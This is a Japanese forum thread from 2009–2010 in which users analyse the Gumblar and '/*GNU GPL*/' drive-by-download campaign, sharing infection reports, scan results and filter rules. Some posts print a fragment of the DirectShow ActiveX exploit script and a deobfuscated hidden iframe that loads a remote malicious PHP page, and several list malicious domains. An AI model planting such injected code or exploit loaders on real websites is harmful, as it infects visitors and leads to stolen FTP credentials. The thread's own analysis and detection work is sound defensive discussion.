57 名前：名無しさん＠お腹いっぱい。 [2009/12/28(月) 01:45:29 ]: >>45
セーフだろうが。嘘を書くなよ
58 名前：名無しさん＠お腹いっぱい。 [2009/12/28(月) 01:47:36 ]: >>57
まさか、ウィルススキャンでチェックしてスルーしたからセーフとか言ってないよな？
59 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 01:48:31 ]: ね、URLそのまま晒すとこんな奴出てくるでしょ。>>57
晒すときは>>1をよく読もう
>＊＊＊危険なサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください＊＊＊

>>56
そしてその危なっかしいものを有効活用しているところがあるという・・・
ttp://slashdot.jp/security/comments.pl?sid=441912&threshold=1&commentsort=3&mode=thread&pid=1526692#1526854
60 名前：名無しさん＠お腹いっぱい。 [2009/12/28(月) 01:51:09 ]: >>58
自己レス
digimaga●net/

開くと、JREが起動して、アクセスに行こうとするな。ロシアのサイト。
61 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 01:51:33 ]: デジマガ/*GNU GPL*/あるな
で、>>57は踏んだのか？　どうなった？
62 名前：名無しさん＠お腹いっぱい。 [2009/12/28(月) 01:56:24 ]: >>61
ここに行こうとしてるな。
adsrevenue-net.king.com.newgrounds-com.themobilewindow●ru:8080

やられてるだろ。これ。
63 名前：名無しさん＠お腹いっぱい。 [2009/12/28(月) 01:58:05 ]: >>61
adsrevenue-net.king.com.newgrounds-com.themobilewindow●ru:8080
ここに向けてリクエスト出してんぞ。

まぁ確実かな。
64 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 01:58:54 ]: pdfupd.exeが落ちてくる
virustotalではどれも検出しない
65 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 02:00:47 ]: >>62-63
普通踏んだら速攻で（この場合はロシアから）何か運んでくるものなの？
初心者でゴメン
なんかファイルができたとか、そういう話は今回あまり聞かないよね
66 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 02:03:27 ]: pdfupd.exeを実行する何かダウンロードして
_ex-68.exeを実行しようとするのでこの辺でやめといた
67 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 02:05:29 ]: >>65
いかにユーザーに感染したのが分からないように感染させるのかがマルウェア制作者の腕の見せ所
68 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 02:09:32 ]: >>64.66
どうもありがとう。踏んでてpdfupd.exeが隠しファイル含めて上がってこなかったらセーフかな
69 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 02:11:43 ]: >>65
踏んだら速攻でダウンロード実行される
ドライブバイダウンロードというやつか
適切なアップデートをしておけば問題ない
もちろんセキュリティソフトが停止させる場合もあるが
70 名前：名無しさん＠お腹いっぱい。 [2009/12/28(月) 02:12:18 ]: >>68
「上がる」って、JREやFlash経由で落ちてくるから、ダウンロードポップアップはおろか、IEのキャッシュにも残らない可能性があるからな
念のため言っておくが。
71 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 02:14:43 ]: >>70
いや試したのはJAVAもFlashもインストールされてない環境だ
MSの脆弱性かな

もちろんJAVAやFlashの脆弱性を突かれた場合は同じような動作をするかどうかは分からない
72 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 02:16:27 ]: 実行ファイルも残らないの？
セキュソフトの定義更新が間に合ってなかったら、もう感染確定の判断はできないのかな
バカでゴメン
73 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 02:20:48 ]: >>72
テストしたときは残った
ただテストでは最後まで実行させず途中で終了させた

最後にすべて削除するようなこともあるかも知れない
まあ分からないってことだ
74 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 02:22:26 ]: >>73
そっか･･･ありがとう
とりあえずPCの挙動が安定してるうちは様子見して、各種セキュソフトの対応待つよ
75 名前：名無しさん＠お腹いっぱい。 [2009/12/28(月) 02:27:02 ]: 難読化といてみると、ただJSを落としてるだけっぽいな。
他のJSをダウンロードしてる先が、ロシアってことか。

そいつがさらに脆弱性ついて、ドライブバイダウンロードするって事か。
76 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 02:29:11 ]: >>45
今Aviraで試したらwebguardが検出した。
URL "adsrevenue-net.king.com.newgrounds-com.themobilewindow.ru:8080/pics/win.jpg" のデータにアクセスする際に、
ウイルスまたは不要なプログラム 'EXP/DirektShow.A' [exploit] が検出されました。
77 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 02:30:01 ]: あ、ごめん
直リンしちまったじゃねえか

>>76
はウイルス
注意
78 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 02:37:55 ]: pdfupd.exeってやつ
www.virustotal.com/analisis/3dc5bb7e31f63ccbe56acc6015aff79f59984866c8446377939027097d4e0f5f-1261910241
www.virustotal.com/analisis/3dc5bb7e31f63ccbe56acc6015aff79f59984866c8446377939027097d4e0f5f-1261933023
anubis.iseclab.org/?action=result&task_id=1596ebc77b0f8b50455c2be30bccc5450&format=html

同じURLから27日午前9時頃拾ったやつ
www.virustotal.com/analisis/e5de8aaec04471ffb18d9fc351f027c3aa121d9d95fb35af47570fab5ea8c849-1261872557
www.virustotal.com/analisis/e5de8aaec04471ffb18d9fc351f027c3aa121d9d95fb35af47570fab5ea8c849-1261903328
79 名前：名無しさん＠お腹いっぱい。 [2009/12/28(月) 02:43:33 ]: pdfupd.exe って名前から判断して、またAdobeReaderの脆弱性か？。

たしかコレって、ゼロデイの可能性ありってやつじゃなかったか？
www.adobe.com/support/security/advisories/apsa09-07.html

これじゃねーだろうなぁ。
これだったら、Js切るか、AdobeReaderアンインスコしない限り、対策ないぞ。
80 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 02:48:41 ]: >>79
あんた、ちょっと遅れてる・・・・

新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃～今すぐ対策を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2106

Adobe Reader 及び Acrobat の未修正の脆弱性に関する注意喚起（JPCERT/CC）
ttps://www.jpcert.or.jp/at/2009/at090027.txt
81 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 02:48:53 ]: >>79
マイクロソフトのActiveX
MS09-032あたりじゃないかな
82 名前：名無しさん＠お腹いっぱい。 [2009/12/28(月) 02:53:23 ]: >>80
ありゃ。やっぱゼロデイか。PDF切っとくか。
83 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 02:57:49 ]: >>82
pdfupd.exeは>>81氏が言うActiveXの脆弱性突くものかもしれないけど、ゼロデイ攻撃始まってるのも事実ってことで
84 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 03:00:07 ]: 今回はマイクロソフトのActiveXの脆弱性を突かれてpdfupd.exeがダウンロード実行されたってこと
Adobe Readerがインストールされていれば違った攻撃もあるかも知れない
85 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 03:12:40 ]: >>78みる限り、各ベンダー全滅、かろうじてカスペが引っかかったりしなかったりで
後はGENOみたいにPC立ち上がらなかったりするような分かり易い症状もないってこと？
86 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 03:16:04 ]: GENO系の全てに黒画面にマウスカーソルの症状が出る訳じゃないんだけど
87 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 03:16:17 ]: 上にもあるように
ノートンやAviraなどはファイルスキャンではなくwebサイトにアクセスすると検出する仕組みになってる
AviraフリーはWebGuardが無いから注意が必要だが
88 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 03:19:08 ]: >>78はpdfupd.exeの検出結果のみであって、どのファイル・コード・タイミング・振る舞いで検出するかもベンダーで違うだろうしなんとも言えないな
ヒューリスティックで捕まえる場合もあるだろうし

ただ
>分かり易い症状もないってこと？
これはYesって言っといた方が対策する人も増えるか？
89 名前：87 mailto:sage [2009/12/28(月) 03:21:34 ]: ごめん
AviraはWebGuardじゃなくても検出するかも知れない
検証はしていないので分からない
90 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 03:24:39 ]: >>76
WebGuardなくてもAviraで検出することを確認
91 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 03:32:43 ]: >>24
自己レス
avast!がスクリプトに対応

/*GNU GPL*/
26日　結果: 1/41
Avast　4.8.1351.0　2009.12.27　JS:Illredir-B
ttp://www.virustotal.com/jp/analisis/bbb1b07545f46b6310ef1d8508e31437531a89a58e0cf263590bc4bce8ae68b9-1261938262
92 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 03:32:56 ]: >>76
win.jpg のvirustotalスキャン結果
ttp://www.virustotal.com/jp/analisis/a58e3a42daf56fa95d67a157b9c699e43e89e254bcc717ff04d9d19d1ffb40b4-1261938568
93 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 03:45:55 ]: >>91
avastは誤検出しまくってるようだが
そのせいではないの？
94 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 04:08:43 ]: JAVAを利用した攻撃の際は
win.jpgではなくJavaGame.jarがダウンロードされる
www.virustotal.com/jp/analisis/273460dd3c1cccd44da0e1f8e19e0cf506ad490f5624535cc789f65496e940f9-1261940810
95 名前：94 mailto:sage [2009/12/28(月) 04:10:59 ]: ちなみにノートンではダウンロードしようとするときに検出するが
virustotalで検出されない
96 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 05:00:58 ]: JAVAが無いときは
Adobe Readerも利用されるね
97 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 06:39:35 ]: beatarai●blog90.fc2●com/

avastのスレでも書かれていたけど、
このブログは大丈夫？
98 名前：名無しさん＠お腹いっぱい。 [2009/12/28(月) 07:20:25 ]: win.jpg はDirectShowのMS Video ActiveX Control（CVE-2008-0015）の脆弱性攻撃。
JavaGame.jar はJRE（CVE-2008-5353）の脆弱性攻撃。
pdfupd.exe はAdobe Readerの脆弱性攻撃用の ChangeLog.pdf が落として来て実行するトロイの木馬本体。
他のルートでも最終的には同じものが落ちて来て、このトロイの木馬が Bredolab とか HDrop
とかで検出されるはず（でも今は全然検出してくれなぁ）のダウンローダです。

ダウンローダが、その後何をダウンロードしてくるかは、その時の攻撃者の気分次第。
攻撃側が用意したものを何でもインストールできちゃうわけね。

実行してみれば、その時点で落ちて来るものは分かるんだろうけど。
99 名前：名無しさん＠お腹いっぱい。 [2009/12/28(月) 08:37:05 ]: 何か役に立つかもしれないので報告

fxwill●comにウイルスがあると聞き試しに見てみた（←阿呆）
/*GNU GPL*/～というコードが埋め込まれてたっぽい
↓
サイトを開くと
このファイルの実行を許可しますか？というウインドウが出てきて（VISTA）
「キャンセル」を押しても再度同じウインドウが表示
何度押しても同じでそのうち画面が固まる
↓
再起動して、通常起動でウインドウを開始すると
マイクロソフトセキュリティーエッセンシャルが反応
詳しい表示は憶えてないけど、表示されたファイルの削除を選択（履歴見ても何も残っておらず詳しいことが不明）
↓
PCはそのまま使えていたので安心していたら、
出先で自分のサイトを携帯でみたらエラー５００が表示されるのに気づく
↓
家に帰り、サーバーの履歴を見ると感染源のサイトを見た直後から複数のIPでログインされてた。
そしてパソコンの電源を切って外出した時間あたりでログインも止まっていた。
↓
もう１台のパソコンからFTPのパスワードなど変更
サーバー上のファイルも消去
ファイルを見るとindex.html index.php ～.jsファイルがほぼすべて最下部に/*GNU GPL*/～が埋め込まれていた。
↓
問題のPCにカスペの体験版を入れて（オンラインスキャンが停止中なので）みたら
スタートアップにsiszyd32.exeが検出されたので削除。
↓
今ここ

もうこれ再インストールするしかないんでしょうか。
100 名前：名無しさん＠お腹いっぱい。 [2009/12/28(月) 08:42:16 ]: 追記

説明がわかりにくいね
自分のサイトはレンタルサーバー上にあり
FTPで更新しています。
101 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 08:47:32 ]: >>99
感染した状態でサイト更新した？
それともFTPとか使ってなく自サイトにアクセスした覚えがないのにパス抜かれて改ざんされたの？
102 名前：名無しさん＠お腹いっぱい。 [2009/12/28(月) 08:58:22 ]: >>101

レンタルサーバーは２つ借りていて
片方はWORDPRESSの管理画面からログインはした。

でももう一方は数カ月まったく使っていないサーバーで
念のためにもう一台のパソコンから調べたらしっかりファイルが書き換えられてた。
どちらもFTPソフトにパスワードは登録していた。
103 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 09:28:45 ]: サイト閉じてとっとと再インスコしろよ…
104 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 09:41:40 ]: >>93
webシールドで止まるようになった。
105 名前：名無しさん＠お腹いっぱい。 [2009/12/28(月) 11:41:07 ]: https://twitter.com/digimaga

いや、アンタが最初にすべきことは、自分のサイトを閉じることだろ。。
106 名前：名無しさん＠お腹いっぱい。 [2009/12/28(月) 12:38:09 ]: どもども、９９です
サイトは閉めてサーバー上のファイルは全部消してるよ

今、PCの再インストール中
いらんソフトとか捨てるいいきっかけになったよ、スッキリ
107 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 14:42:08 ]: >>106
FTPクライアントは何使ってるの？
パスワード保護に強いのはないかな？
FileZilla使ってるけど全く暗号化してないしこれ最低だよな
108 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 15:10:25 ]: これってオンラインゲームのIDもとられるの？
109 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 15:38:16 ]: そんなチンケな物はとらんよ、たぶん
110 名前：名無しさん＠お腹いっぱい。 [2009/12/28(月) 16:35:05 ]: >>>107

FFFTP使ってる

サーバーのログイン履歴詳しく見てみたけど
やっぱりパソコンの電源切った時からログインがなくなってる
感染から外出まで1時間、外出から帰宅まで4時間
感染
↓
感染に気付かずPC電源切り外出
↓
帰宅

電源切るまでは、ほぼ10秒単位でランダムなIPからログインあり。
その後帰宅するまでまったくログインなし。

あと、/*GNU GPL*/～というコードの最後に規則的な英数字が０～３００個ずつ改行されてくっ付いてた。

一応参考までに報告
111 名前：名無しさん＠お腹いっぱい。 [2009/12/28(月) 22:49:21 ]: 「思い立ったら書く日記」と「べつになんでもないこと」はググって必ずチェックすることをオススメする。
112 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 22:52:00 ]: 遠慮しとく
113 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/28(月) 22:58:43 ]: >>110
参考になった。情報サンクス。
114 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/29(火) 08:46:20 ]: 感染確認に
適当なフリーページ登録してFTPでアップロードしてみりゃいいのかな？
115 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/29(火) 14:51:00 ]: 某ブログで見たが8080系はWinampの脆弱性も突くのか？
116 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/29(火) 15:40:07 ]: Winampの脆弱性ってのもよくわからないんだよな。
俺は必要十分余計な機能は欲しくないという理由でいまだに2.81を使っているんだが、現行とは
系統が違うこのあたりの古いバージョンにも同様の危険性があるのかねえ？
117 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/29(火) 16:02:10 ]: Winampは何度か脆弱性が話題になってるよな
出来れば最新を使うか使わない方が良い
118 名前：116 mailto:sage [2009/12/29(火) 18:08:06 ]: WAN接続はCDDBからの情報取得だけでファイルを直接再生することは皆無なんだけどね。
最新版への更新も検討してみるかな。
119 名前：名無しさん＠お腹いっぱい。 [2009/12/29(火) 23:28:07 ]: >>115

この辺のことか？
| var ovCEkVSTS = document.createElement('object');
| document.body.appendChild(ovCEkVSTS);
| ovCEkVSTS.id = 'IWinAmpActiveX';
| ovCEkVSTS.width = '5';
| ovCEkVSTS.height = '5';
| ovCEkVSTS.data = './pics/win.jpg';
| ovCEkVSTS.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
| var tIx8bqnvuS = *** ShellCode ***

IWinAmpActiveXって名前付けてるけど、呼び出してるclassidはDirectShowだよ。
そんで、MSVideoの脆弱性（CVE-2008-0015）搭載のwin.jpgを食わせてShellCode実行！
120 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/29(火) 23:40:42 ]: 違うだろ
121 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/30(水) 12:04:12 ]: >>119
ttp://img51.yfrog.com/i/73429545.png/
122 名前：名無しさん＠お腹いっぱい。 [2009/12/30(水) 13:24:05 ]: このウィルスって各ベンダーのスキャンで発見できるの？
FTPにファイル上げるときに、同じく登録してあった別パスぶっこ抜かれて全部改竄されたって話だけど
逆にFTPにパス保存してあっても、実際に起動して更新作業しない限り
サイト改竄は免れんの？
それとも感染直後に（感染後FTP未使用でも）勝手にパス抜きされて接続、改竄なの？
123 名前：名無しさん＠お腹いっぱい。 [2009/12/30(水) 15:22:39 ]: 8080用チェッカー作った
124 名前：名無しさん＠お腹いっぱい。 [2009/12/30(水) 16:30:26 ]: Gumblarは新コードのテスト中？
＜script src=ｈttp://「中略」.php?op=java ＞＜/script＞＜body＞
125 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/30(水) 17:47:35 ]: 俺もやれたんだけど
FFFTPに登録してあるサイトが全部がやられた
接続してないサイトもやられてたから
どれか1つ接続するとリストにある奴が全部やられたってことだな

つまりこれってFFFTPがハッキングされたことになるのか？
他の感染者がどのFTPソフト使ってるのかわかないからなんともいえないが

というか感染してからまだウィルスだと気づいてないとき自分のサイト見たら
AVGが反応したんだが、つまりウェブ上からは感染は防げてたってことだから
最初の感染はローカルってことになる

pdfとか見てたからやっぱり感染元はこれっぽいな
126 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/30(水) 17:58:49 ]: 感染したときに設定読み取るのかもよ
127 名前：名無しさん＠お腹いっぱい。 [2009/12/30(水) 19:27:20 ]: >>121
うっ！ほんとだ。
2年ぐらい前のAOL Winampの脆弱性ぽいっすね。
わざわざインストールさせようとしているcabを落としてみたら
2005年4月版でやんの。何でAOLはこんな古いの置いてんだ。
128 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/30(水) 20:02:06 ]: >>99見てると、UAC有効にしてても効果がないってことか
129 名前： ◆774......E mailto:sage [2009/12/30(水) 22:17:20 ]: 新型8080系用のチェッカー出来たので公開してみるテスト
www12.atpages.jp/trick1/
130 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/30(水) 23:59:28 ]: 俺はどこも信用できないね
131 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/31(木) 00:57:04 ]: >>129
せめて文字コードぐらい指定してくれ
IEで開いたら文字化けしてびびったｗ
ウィルスかた思ったぜｗ
132 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/31(木) 01:49:39 ]: もうネットにつながないから
この脅威が去ったら電話くれ！
133 名前：名無しさん＠お腹いっぱい。 [2009/12/31(木) 10:25:50 ]: 結局、感染したらFTPで鯖にファイル上げるしか確かめようは無いのか？
感染した奴は皆このルートで判明？
134 名前： ◆774......E mailto:sage [2009/12/31(木) 10:40:00 ]: >>131
ごめんなさい＞＜文字コード指定しました
135 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/31(木) 12:05:30 ]: ここに張ってるURLは危険そうですな
136 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/31(木) 12:17:02 ]: /*GNU GPL*/踏んだ可能性があるんだけど
spoolsv.exeってのが新たに出来てる気がする
これ関係ある？
137 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/31(木) 12:33:10 ]: >>136
spoolsv.exeはプリントスプーラだよ。
プリントジョブの仕掛かりが溜まってない？
138 名前：名無しさん＠お腹いっぱい。 [2009/12/31(木) 13:24:17 ]: >>137
いや、それが少なくともここ1年はプリンタにつないでないPC
なのにマカのファイアーウォールの設定でもいつの間にか送受信完全に許可扱いになってる
そもそもタスクマネジャでメモリ使用上位にそんなのは今までいなかった気がする
で、spoolsv.exeでググったら、トロイの偽装の可能性と出てきたんで

でもフルスキャンしても何もでてこないし
CPU使用率は安定してるし
少なくとも表面上はPCがどこかにアクセスしっぱなし、と言う風には見えないし
もうどうすりゃいいんだか
139 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/31(木) 13:38:46 ]: >>131 乙
ついでに、Gumblarの簡易チェックも組み込めないかな？

</head><script src=*.php ></script><body
これがあったら黒判定って事で。
140 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/31(木) 13:41:12 ]: >>138
サービスを殺しても生きてたら
変なのが寄生してると思われ。
141 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/31(木) 14:13:43 ]: >>138
Process ExplorerかSlightTaskManager(これはXPまでらしい)でspoolsv.exeのパス(フォルダ)を
確認して、spoolsv.exeのファイルのプロパティで作成日時、更新日時、等がおかしくないか確認。
その後、spoolsv.exeをvirustotalでチェックする、くらいしか思いつかない。
142 名前：138 [2009/12/31(木) 16:06:59 ]: >>140-141
Process Explorer等入れてないんで（この状況下でネットつなげないし）
マカのアクセス許可設定にあったパス(system32以下)でプロパティチェック
作成日時、更新日時は随分前のまま変わらず(少なくとも踏んだ可能性のある日じゃない）で56.5kb
メモリの使用量は38.956
ネットきってるんでvirustotalに確認にいけてないが、なんとなく白っぽい
気がするんだがどうか

サイト管理者以外で、/*GNU GPL*/感染確認するには、本当どうしたらいいんだろうか
143 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/31(木) 16:19:01 ]: spoolsv.exeはOSにデフォルトで入ってるだろ
144 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/31(木) 17:24:32 ]: >>143
もちろんそうなんだが
どんだけスキャンかけても何にも引っかからないんで、
とりあえず普段と（多分）違う挙動のものを虱潰しにしてるんだよ
spoolsv.exeがトロイ偽装のケースもあるって話しだし
/*GNU GPL*/感染で、実際にどんな症状が出るかってのが全く聞こえてこないんだが
サイト改竄以外に何があるんだ？

つうかPC調子悪いときに携帯規制とかキッツイ
145 名前： ◆774......E mailto:sage [2009/12/31(木) 18:27:33 ]: >>139
今回のバージョンアップの際に簡易的にチェックするようにしました。
もしかしたら誤検出があるかもしれません

>>144
別のウイルスをダウンロードしてきます。
146 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/31(木) 18:28:55 ]: どこの馬の骨だよ
147 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/31(木) 20:03:18 ]: >別のウイルスをダウンロードしてきます。

今回感染後も普通にPCつかえてて、自サイト改竄が発覚して漸く感染に気づくとか
そんなのばっかりな気がするけど
/*GNU GPL*/感染のケースで他のウィルス呼び込んだ事例あがってんの？
148 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/31(木) 21:21:18 ]: 紅白FLASH合戦スレで/*GNU GPL*/報告出たけどスルーされてたな
何人か開いちゃったんじゃないのあれ
149 名前：名無しさん＠お腹いっぱい。 [2009/12/31(木) 22:37:48 ]: なんかあっちこっちのスレで/*GNU GPL*/のURL貼られてる割に
いまいち騒ぎになってないよな
JRやホンダまで感染したのに、そこを踏んで自分が感染したっていう犠牲者の声が少ない
GENOのときはPC再起動不可っていう分かりやすい（といか致命的）エラーが出たから
皆感染が分かったけど
今回は自覚症状無いまま、感染後そのままPCで飼ってるやつ多い気がするんだが
150 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/31(木) 22:45:08 ]: アドビ関係全部アンインスコして専ブラで2chだけを見るネット生活を八ヶ月続けてるが
それでも不安が拭えない
151 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/31(木) 22:51:56 ]: オミで/*GNU GPL*/を含むscriptタグを殺しちゃえばいいんじゃね
152 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/31(木) 23:10:21 ]: >>149
Gumblarの時にはコマンドから起動出来る出来ないや
ファイルのサイズでで見分けられたりしたけど
今回はどうやって見分けるかのかまだよく分からないしなあ・・・
各種アンチウイルスソフトは感染しているときちんと動作するのかとかも。

違法ファイルのダウンロードの法律よりも、故意にウイルスばらまいたやつに
罰則強化とかしてほしい。
153 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/12/31(木) 23:26:33 ]: 今回のは感染後、各ベンダーのサイトが開けなくなったとか
MSアップデートが出来なくなった、とかそういう話も聞かないよな
今のところは「FTPでパス抜きされたあと」から、10秒単位で不正アクセスっていう
コレくらいしか目立った特徴は出てない気が
154 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/01(金) 03:48:56 ]: 年明け早々、会社のWEBページが改ざんされたｗ

形態に電話があり、今から出勤、最悪。

Gumblar再開とかかいてあるし、何されてるのか。

正月休みもパーだな。
155 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/01(金) 03:51:48 ]: 脆弱性対策をしててもプラウザのJavaScriptがオンなら、8080サイトからマルウェアが自動的に
ダウンロードされて、発動はしなくてもPC内に残るのかな？もしそうなら、それはそれで気持ち悪いな
156 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/01(金) 04:55:50 ]: >>154
ドンマイw
157 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/01(金) 04:58:13 ]: >>155
いや
158 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/01(金) 05:31:17 ]: Adblock Plusの存在を忘れてた･･orz

・8080
*:8080*$script,link,object

・Gumblar
*.php$script,link,object
159 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/01(金) 17:36:13 ]: ttp://pc11.2ch.net/test/read.cgi/sec/1262054865/392-405　から。
　→ ttp://www●stardustpictures●co●jp/katagirihairi4/
160 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/01(金) 17:56:02 ]: カスペルスキーのオンラインウイルススキャンは現在は停止中なのかな？
161 名前：age [2010/01/01(金) 18:02:21 ]: 某所から転載
--ここから--
www●ideele●nl/a-home.htmに埋め込まれたコードの難読化を解除すると
＜iframe width=1 height=1 border=0 frameborder=0 src='ｈttp://sodanthu●com/in6.php'＞＜/iframe＞
--ここまで--

↓同一のコードが仕込まれてる↓
tp://rcmorningstar●com/cp/scripts/formmail-doc/example_src●html

因みに>>129のチェッカーはスルーする。
162 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/01(金) 18:37:19 ]: チェッカーだめじゃんｗ
163 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/01(金) 18:43:01 ]: >>161
カスぺは反応するが
164 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/01(金) 19:12:55 ]: >>159
30日くらいにモームス板(?)に
"超一流芸能事務所スターダストのホームページにトロイの木馬"
ってスレが立ってたようだけど、それかな？
スレ自体は直ぐに落ちた様だけど。

avast!だと、JS:Illredir-B [Trj] で
カスペルスキーだと Trojan-Clicker.JS.Iframe.db なのかな？

先日、avast!が JS:Illredir-B [Trj] をブロックしてくれたのかも知れないけど
個人ブログとかにも広がってるかも。
165 名前：名無しさん＠お腹いっぱい。 [2010/01/01(金) 19:12:58 ]: >>110
乙です。

感染すると自動的に他のPCから他のPCからかきかえにくるのかな。
ボットか何かかな。
166 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/01(金) 19:20:43 ]: カスペのオンラインでもいまだと検出されるの？

>>160ニフの方も止まってるの？
167 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/01(金) 19:24:09 ]: >>166
ニフティの方は分からないけど、公式(日本語)サイトの方は
年末年始って事なのか停止中っぽいけど。
168 名前：161 mailto:sage [2010/01/01(金) 19:48:25 ]: "<script>function" "return String.fromCharCode(c);" "getElementById("
高確率でヒットするので、これで捜索中･･･
169 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/01(金) 19:56:23 ]: >>167
ニフの方はいけたはずだけど、中身同じじゃねえの？
170 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/01(金) 21:16:49 ]: よくよく読んでみたら、上で報告の上がってる>>99ってFFTTP起動させるまえ、
感染サイト踏んだ直後から自サイトにアクセスされて書き換えされてたって事？
となると、踏んでアウトなら、
その瞬間にFTP起動有無にかかわり無く速攻保存してある管理パス抜かれて
改竄されるって事か
171 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/01(金) 21:24:13 ]: FFFTPだった。まあいいや
172 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/01(金) 22:10:22 ]: >>161
検索してみた

悪意のあるリンク先URLのリスト（マルウェアドメイン一覧）
ttp://www.itis.tw/badlink
↑ここにリストがありますね
ホストするIP:127.0.0.1

ttp://www.itis.tw/badlink←誰が作ったの？
173 名前： ◆774......E [2010/01/01(金) 23:06:02 ]: >>161
反応するようにしました。
174 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/02(土) 05:59:43 ]: >>172
台湾人だろ
175 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/02(土) 07:38:11 ]: GNU GPLのやつなんてファイアウォールで
アウトバウンド制御してるだけでも防げそうだけどな
感染した人は入れてないだろ
176 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/02(土) 08:22:58 ]: >>174
知らねえ奴は黙ってろ
177 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/02(土) 09:40:25 ]: >>175
そう言えば
なぜかファイアウォールのアウトバウンド制御はいらないとか主張するやつが最近増えてたな
それだけでも防げることなのに
178 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/02(土) 10:19:30 ]: シナの留学生が工作してるんだろｗ
179 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/02(土) 10:27:39 ]: 中国のIP防ぐだけでもかなり安全になるよね
